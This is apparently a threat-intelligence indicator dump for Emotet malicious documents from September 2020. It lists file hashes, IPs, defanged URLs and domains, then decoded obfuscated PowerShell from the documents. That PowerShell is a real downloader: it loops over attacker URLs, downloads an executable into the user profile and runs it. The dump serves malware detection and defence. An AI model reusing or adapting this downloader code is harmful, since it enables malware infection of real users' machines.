Emotet_Doc_out_2020-09-24_22_54.txt

1. #Emotet #Docs #malware #OSINT #IOC
2.  
3. SHA256:
4. 4c01a100f2196b2ac8a43d41f1c9beb894ae460d87f37b2c884850fe5854bf4a
5. da886aa9c4cf9af28406c6c6b2bd1a84fdca0dd1861259185aba9da512264acf
6. ab018f08c79d8a8f4335f9fa35e22f6d573ddcf82c5a1db98a8ceb6671bae1b6
7. a173c80617eccbb5abd724c6c42da5355329ffc94e544185e1401d97c9146964
8. 741df6ea7d9eff7ced2d6f50bfd469119965326edce722df9f15fc59b97afba3
9. 241da35fc47abf50c83032be9bdb0df27d81d7d1920055a76b7a84aedeb8a30d
10. 910452e8c07c66c557c01772883f75fa0890c0e41b8d55b1107360949ccefc71
11. 418535f82699ce0df10d39ac2798fcce30da6070fb7b9b0f28562d1146f49e69
12.  
13.  
14. IPs:
15. 104.27.170.56
16. 104.27.171.56
17. 104.28.21.189
18. 104.28.26.13
19. 104.28.27.13
20. 107.180.43.18
21. 116.202.49.153
22. 162.241.148.206
23. 166.62.28.114
24. 172.67.128.206
25. 172.67.151.83
26. 172.67.211.35
27. 192.185.94.102
28. 195.201.163.40
29. 198.211.112.209
30. 205.144.171.138
31. 23.229.220.67
32. 71.185.193.253
33. 91.121.71.156
34.  
35.  
36.  
37. URLs:
38. hxxp://h2a1.com/uf8vu/U/
39. hxxp://www.almakaaseb.com/wp-includes/P/
40. hxxp://theitnconsultant.com/wp-includes/t/
41. hxxp://carstarai.com/icon/D/
42. hxxp://bug.chihuahuamediaprojects.com/wp-includes/u/
43. hxxps://aecc.dev.caveim.net/wp-admin/dZ/
44. hxxp://phimsex.2xxhub.com/wp-content/esp/5ur8drbma/6qH/
45. hxxp://www.firhajshoes.com/wp-admin/RgaiT/
46. hxxp://fakeread.com/OneSignal-Web-SDK-HTTPS-Integration-Files/Wf/
47. hxxp://www.rttutoring.com/wp-includes/LlbY6o/
48. hxxp://blueskysol.com/sys-cache/2Rk/
49. hxxp://crazyboxs.com/cgi-bin/IaJ/
50. hxxp://www.paramedicaleducationguidelines.com/wp-admin/3jXU5Bp/
51. hxxp://nuhatoys.com/wp-admin/WWA4R/
52.  
53.  
54. Domains:
55. h2a1.com
56. www.almakaaseb.com
57. theitnconsultant.com
58. carstarai.com
59. bug.chihuahuamediaprojects.com
60. aecc.dev.caveim.net
61. phimsex.2xxhub.com
62. www.firhajshoes.com
63. fakeread.com
64. www.rttutoring.com
65. blueskysol.com
66. crazyboxs.com
67. www.paramedicaleducationguidelines.com
68. nuhatoys.com
69.  
70.  
71. Decoded Base64 Powershell:
72. <���^,$E5e8mp8=Qvr9gqg;
73. &new-item $ENV:UsERProfiLE\EXyas68\X_XE08_\ -itemtype dIreCtOrY;
74. [Net.ServicePointManager]::"sEcU`R`iTY`ProT`oCol" = tls12, tls11, tls;
75. $Yb4x084 = Qicxrezc;
76. $Kdtinxb=Aqf3843;
77. $Ywm_t6r=$env:userprofile{0}Exyas68{0}X_xe08_{0}-f [chAR]92$Yb4x084.exe;
78. $Mo8n_4q=Bs26mlb;
79. $Yl_cszo=.new-object NeT.webCLIent;
80. $Aegp_0c=hxxp://h2a1.com/uf8vu/U/
81. hxxp://www.almakaaseb.com/wp-includes/P/
82. hxxp://theitnconsultant.com/wp-includes/t/
83. hxxp://carstarai.com/icon/D/
84. hxxp://bug.chihuahuamediaprojects.com/wp-includes/u/
85. hxxps://aecc.dev.caveim.net/wp-admin/dZ/
86. hxxp://phimsex.2xxhub.com/wp-content/esp/5ur8drbma/6qH/."sP`lIt"[char]42;
87. $Bh0lo9j=L6f_a41;
88. foreach$Mpoikef in $Aegp_0c{try{$Yl_cszo."dOWn`Lo`A`DFiLE"$Mpoikef, $Ywm_t6r;
89. $I9a2311=Qzg78h1;
90. If .Get-Item $Ywm_t6r."LeN`gth" -ge 33997 {.Invoke-Item$Ywm_t6r;
91. $A116qlt=Z9exr4j;
92. break;
93. $Htpllnm=Jzz3nbi}}catch{}}$Luacav6=Mw43w0f<���^,$Ehef59i=Zs50d5b;
94. &new-item $Env:UserpROfIle\I2byDoI\ejo26QD\ -itemtype DIRECtory;
95. [Net.ServicePointManager]::"S`e`cUri`TyProtOcol" = tls12, tls11, tls;
96. $F3ysqov = P_lulvp1;
97. $Mlop803=Fnjkp8o;
98. $Dglrx5x=$env:userprofile{0}I2bydoi{0}Ejo26qd{0} -f[CHar]92$F3ysqov.exe;
99. $Ezwvj1m=We7etev;
100. $Up2imep=&new-object Net.wEbCLient;
101. $Swkc22m=hxxp://www.firhajshoes.com/wp-admin/RgaiT/
102. hxxp://fakeread.com/OneSignal-Web-SDK-HTTPS-Integration-Files/Wf/
103. hxxp://www.rttutoring.com/wp-includes/LlbY6o/
104. hxxp://blueskysol.com/sys-cache/2Rk/
105. hxxp://crazyboxs.com/cgi-bin/IaJ/
106. hxxp://www.paramedicaleducationguidelines.com/wp-admin/3jXU5Bp/
107. hxxp://nuhatoys.com/wp-admin/WWA4R/."sPl`IT"[char]42;
108. $Khmx6rc=Bk7r4jh;
109. foreach$Ygzxknj in $Swkc22m{try{$Up2imep."DOW`NlO`ADf`iLe"$Ygzxknj, $Dglrx5x;
110. $Ycf84fz=Zgu3dyf;
111. If &Get-Item $Dglrx5x."l`enGtH" -ge 21773 {.Invoke-Item$Dglrx5x;
112. $L7hv3yz=Ct_66pw;
113. break;
114. $Uhr0y_j=Oxy8kpo}}catch{}}$Uzmn_sg=Mk1xz8e
115.